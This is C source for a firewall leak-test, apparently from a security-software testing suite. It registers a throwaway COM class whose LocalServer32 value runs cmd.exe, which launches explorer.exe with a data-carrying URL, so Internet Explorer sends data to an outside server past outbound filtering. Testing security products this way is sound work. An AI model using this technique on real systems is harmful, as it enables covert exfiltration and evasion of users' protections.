/*

 Security Software Testing Suite - NewClass (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * The original idea by www.matousec.com, Different Internet Experience Ltd.


 Method description:

   * Create a new class in registry, which local server is set "cmd.exe" with a special parameter,
     which executes Windows Explorer with a URL as a command line parameter so that Internet Explorer
     is executed. This URL parameter, which also contains the data to transmit, redirects Internet Explorer
     to the Internet webpage.

   * Attempt to create a new instance of the new class. This attempt fails but system COM server starts "cmd.exe",
     which starts Internet Explorer and because of the URL command line parameter, Internet Explorer is redirected
     to the target URL.

*/

#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#include <objbase.h>
#include <exdisp.h>
#include <shlguid.h>
#include <mshtml.h>
#include "include/common.h"
#include "include/common-leak.h"
#include "include/common-hook.h"

// {8077C66D-C147-4cd7-8A9B-81485688C6AE}
static const GUID CLSID_NewClass={ 0x8077c66d, 0xc147, 0x4cd7, { 0x8a, 0x9b, 0x81, 0x48, 0x56, 0x88, 0xc6, 0xae } };


/*
 A thread routine that just tries to create instance of our NewClass.

 'err_inf' A pointer to a structure that will be filled with an error message and a code if an error occurs.

 Returns 0.
*/

DWORD WINAPI create_instance(PCOM_ERROR err_inf)
{
  HRESULT hres=CoInitialize(NULL);
  if (SUCCEEDED(hres))
  {
    if (com_verbosity_get()) printf("Creating instance of Internet Explorer ...\n");

    // This CoCreateInstance call will always fail because Internet Explorer is not a factory for objects of our class.
    // However, Internet Explorer will be started and that is what we want.
    void **nc=NULL;
    CoCreateInstance(CLSID_NewClass,NULL,CLSCTX_LOCAL_SERVER,IID_IUnknown,(void**)&nc);

    CoUninitialize();
  } else com_err_set_sc(err_inf,HRESULT_CODE(hres),"Unable to initialize COM.\n");

  return 0;
}


int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
  COM_CONF conf;
  if (!com_console_init_winmain("NewClass","newclass",lpCmdLine,&conf,COM_TEST_TYPE_NEWCLASS)) return 1;

  char *used_dlls[]={"advapi32.dll","ole32.dll","oleaut32.dll"};
  if (!com_hook_load_libraries(used_dlls,3)) return 1;

  com_uri_replace_eq(&conf);
  DeleteUrlCacheEntry(conf.uri);


  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  int class_created=FALSE;
  int delete_key=FALSE;

  char sysdir[MAX_PATH];
  if (com_get_system_path(sysdir,sizeof(sysdir),&err_inf))
  {
    char cmdline[MAX_PATH+COM_INET_URI_MAX_LEN];
    snprintf(cmdline,sizeof(cmdline),"\"%s\\cmd.exe\" /C explorer.exe %s&",sysdir,conf.uri);
    cmdline[sizeof(cmdline)-1]='\0';

    if (com_verbosity_get()) printf("Command line for the new process set to \"%s\".\n",cmdline);

    HKEY hkey;
    LONG ret=RegCreateKeyEx(HKEY_CLASSES_ROOT,"CLSID\\{8077C66D-C147-4cd7-8A9B-81485688C6AE}",
                            0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hkey,NULL);
    if (ret==ERROR_SUCCESS)
    {
      if (com_verbosity_get()) printf("Registry key \"HKCR\\CLSID\\{8077C66D-C147-4cd7-8A9B-81485688C6AE}\" created.\n");
      delete_key=TRUE;

      HKEY locsrv;
      ret=RegCreateKeyEx(hkey,"LocalServer32",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&locsrv,NULL);
      if (ret==ERROR_SUCCESS)
      {
        if (com_verbosity_get()) printf("Registry key \"HKCR\\CLSID\\{8077C66D-C147-4cd7-8A9B-81485688C6AE}\\LocalServer32\" created.\n");

        ret=RegSetValueEx(locsrv,NULL,0,REG_SZ,(BYTE*)cmdline,strlen(cmdline)+1);
        if (ret==ERROR_SUCCESS)
        {
          if (com_verbosity_get()) printf("The default value of registry key \"HKCR\\CLSID\\{8077C66D-C147-4cd7-8A9B-81485688C6AE}\\LocalServer32\" to \"%s\".\n",cmdline);
          class_created=TRUE;
        } else com_err_set_sc(&err_inf,ret,"Unable to set the default value of registry key \"HKCR\\CLSID\\{8077C66D-C147-4cd7-8A9B-81485688C6AE}\\LocalServer32\" to \"%s\".\n",cmdline);

        RegCloseKey(locsrv);
      } else com_err_set_sc(&err_inf,ret,"Unable to create registry key \"HKCR\\CLSID\\{8077C66D-C147-4cd7-8A9B-81485688C6AE}\\LocalServer32\".\n");

      RegCloseKey(hkey);
    } else com_err_set_sc(&err_inf,ret,"Unable to create registry key \"HKCR\\CLSID\\{8077C66D-C147-4cd7-8A9B-81485688C6AE}\".\n");
  }

  if (class_created)
  {
    HANDLE thread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)create_instance,&err_inf,0,NULL);
    if (thread)
    {
      char buffer[4096];
      if (com_attempt_check_ie_cache(buffer,sizeof(buffer),&conf,20000,&err_inf))
        res=com_find_pattern_and_print_data(buffer,sizeof(buffer),&conf,&err_inf);

      WaitForSingleObject(thread,20000);
      CloseHandle(thread);
    } else com_err_set(&err_inf,"Unable to create thread.\n");
  }

  if (delete_key) RegDeleteKey(HKEY_CLASSES_ROOT,"CLSID\\{8077C66D-C147-4cd7-8A9B-81485688C6AE}");

  return com_end(res,&err_inf,&conf);
}
